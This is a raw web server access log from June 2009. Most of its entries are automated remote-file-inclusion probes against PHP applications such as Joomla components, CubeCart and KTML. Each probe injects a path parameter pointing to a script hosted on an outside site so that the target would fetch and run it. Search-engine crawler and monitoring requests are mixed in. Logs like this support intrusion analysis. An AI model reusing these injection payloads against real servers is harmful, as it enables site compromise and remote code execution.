200.44.126.182 - - [21/Jun/2009:03:39:44 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.44.126.182 - - [21/Jun/2009:03:40:13 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:03:40:55 -0400] "GET //?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:03:40:55 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:03:40:55 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 6381 "-" "Mozilla/5.0"
124.217.216.86 - - [21/Jun/2009:03:40:55 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:03:41:20 -0400] "GET /images/index7_david_sutures.jpg HTTP/1.1" 200 3688 "-" "Googlebot-Image/1.0"
216.17.99.13 - - [21/Jun/2009:03:42:27 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:42:27 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:03:42:29 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.826"
74.6.17.151 - - [21/Jun/2009:03:43:02 -0400] "GET /logs/access_log.Q107091300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
63.147.72.145 - - [21/Jun/2009:03:43:14 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:03:44:28 -0400] "GET /logs/access_log.Q109060400/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.826"
209.59.12.99 - - [21/Jun/2009:03:44:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [21/Jun/2009:03:46:31 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:46:31 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:46:31 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:46:35 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:46:35 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:46:35 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:03:46:35 -0400] "GET /logs/access_log.Q109060600%20/index1.php?site=http://dwno.or.kr/bbs/zipcode/idv6.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
83.98.209.71 - - [21/Jun/2009:03:46:36 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:46:36 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:46:36 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:46:41 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:46:47 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:03:46:48 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:03:46:48 -0400] "GET /logs/access_log.Q109061200/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:03:46:48 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:46:49 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:47:04 -0400] "GET /logs/access_log.Q109061400%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:47:05 -0400] "GET /logs/access_log.Q109060600%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:03:47:08 -0400] "GET /logs/access_log.Q109052200/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:47:49 -0400] "GET /logs/access_log.Q109060600%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:47:49 -0400] "GET /logs/access_log.Q109061400%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.6.17.151 - - [21/Jun/2009:03:47:38 -0400] "GET /logs/access_log.Q109052700 HTTP/1.0" 200 4217417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.98.209.71 - - [21/Jun/2009:03:49:07 -0400] "GET /logs/access_log.Q109061400%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:49:24 -0400] "GET /logs/access_log.Q109060600%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:03:49:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:03:50:16 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:03:50:16 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:03:50:16 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:03:51:31 -0400] "GET /coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:03:51:32 -0400] "GET /logs/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:03:51:32 -0400] "GET /logs/access_log.Q109061800%20%20/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:03:53:10 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6068F53428E2E1004E8200Z+WSEQ(S0060):1+OUITEM(A0200):5052001 HTTP/1.1" 200 27024 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.78.82.142 - - [21/Jun/2009:03:53:49 -0400] "GET /logs/access_log.Q109052700%20%20/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:54:17 -0400] "GET /logs/access_log.Q109052400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:54:21 -0400] "GET /logs/access_log.Q109060200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:03:54:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.70 - - [21/Jun/2009:03:54:44 -0400] "GET /coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:54:44 -0400] "GET /logs/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:54:44 -0400] "GET /logs/access_log.Q109061800%20%20/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:08 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:08 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:08 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:12 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:12 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:12 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:56:35 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:56:35 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:56:35 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:37 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:03:56:40 -0400] "GET /logs/access_log.Q109060100//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:56:44 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:57:00 -0400] "GET /logs/access_log.Q109061400%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.84.128.40 - - [21/Jun/2009:03:57:03 -0400] "GET /logs/access_log.Q109060600%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:57:20 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:57:20 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:57:20 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:57:29 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:03:57:45 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:03:57:45 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:03:57:48 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
116.121.201.70 - - [21/Jun/2009:03:58:23 -0400] "GET /logs/access_log.Q109052700%20%20/coppermine%20components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:58:25 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:58:25 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:58:25 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:58:26 -0400] "GET /logs/access_log.Q109061400%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:03:58:33 -0400] "GET /logs/access_log.Q109060600%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:03:58:45 -0400] "GET /logs/access_log.Q109060600//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:03:59:23 -0400] "GET /logs/access_log.Q109061100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:04:00:07 -0400] "GET /logs/access_log.Q109061400%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:00:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [21/Jun/2009:04:00:50 -0400] "GET /logs/access_log.Q109060600%20%20//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:04:02:44 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:04:02:59 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:03:03 -0400] "GET /logs/access_log.Q109061200%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:04:03:04 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
204.203.92.2 - - [21/Jun/2009:04:03:17 -0400] "GET /logs/access_log.Q109060100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
91.149.157.130 - - [21/Jun/2009:04:03:30 -0400] "GET /logs/access_log.Q109052200%20%20/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:05:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.169 - - [21/Jun/2009:04:05:49 -0400] "GET /logs/error_log.Q108072800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.49.99.7 - - [21/Jun/2009:04:07:37 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:04:08:47 -0400] "GET /images/store_assess_section.jpg HTTP/1.1" 200 10059 "-" "Googlebot-Image/1.0"
211.49.99.7 - - [21/Jun/2009:04:08:50 -0400] "GET /logs/access_log.Q109061100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.93.147.154 - - [21/Jun/2009:04:09:14 -0400] "GET /logs//index2.php?option=com_mambots&Itemid=&mosConfig_absolute_path=https://www.acaciacreek.org/assets/modules/docmanager/js/test.txt?? HTTP/1.1" 404 214 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
200.93.147.154 - - [21/Jun/2009:04:09:14 -0400] "GET //index2.php?option=com_mambots&Itemid=&mosConfig_absolute_path=https://www.acaciacreek.org/assets/modules/docmanager/js/test.txt?? HTTP/1.1" 404 209 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
209.59.12.99 - - [21/Jun/2009:04:10:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [21/Jun/2009:04:11:37 -0400] "GET /bbs///?_zb_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 204 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:11:43 -0400] "GET /logs/access_log.Q109051800/bbs///?_zb_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:04:11:43 -0400] "GET /logs/bbs///?_zb_path=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:11:43 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 250 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:11:43 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 245 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:11:43 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 272 "-" "Mozilla/5.0"
200.54.177.242 - - [21/Jun/2009:04:12:19 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/public/displayCategory.php?basepath=http://barfod.no/modules/fx29id.txt?? HTTP/1.0" 404 272 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:12:27 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:04:15:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [21/Jun/2009:04:20:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:04:21:20 -0400] "GET /index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:21:20 -0400] "GET /logs/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:21:20 -0400] "GET /logs/access_log.Q109051300%20%20/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:21:30 -0400] "GET /index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:21:30 -0400] "GET /logs/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:21:30 -0400] "GET /logs/access_log.Q109051300%20%20/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:21:59 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:22:12 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:24:11 -0400] "GET ///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:04:24:12 -0400] "GET /logs///?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 6382 "-" "Mozilla/5.0"
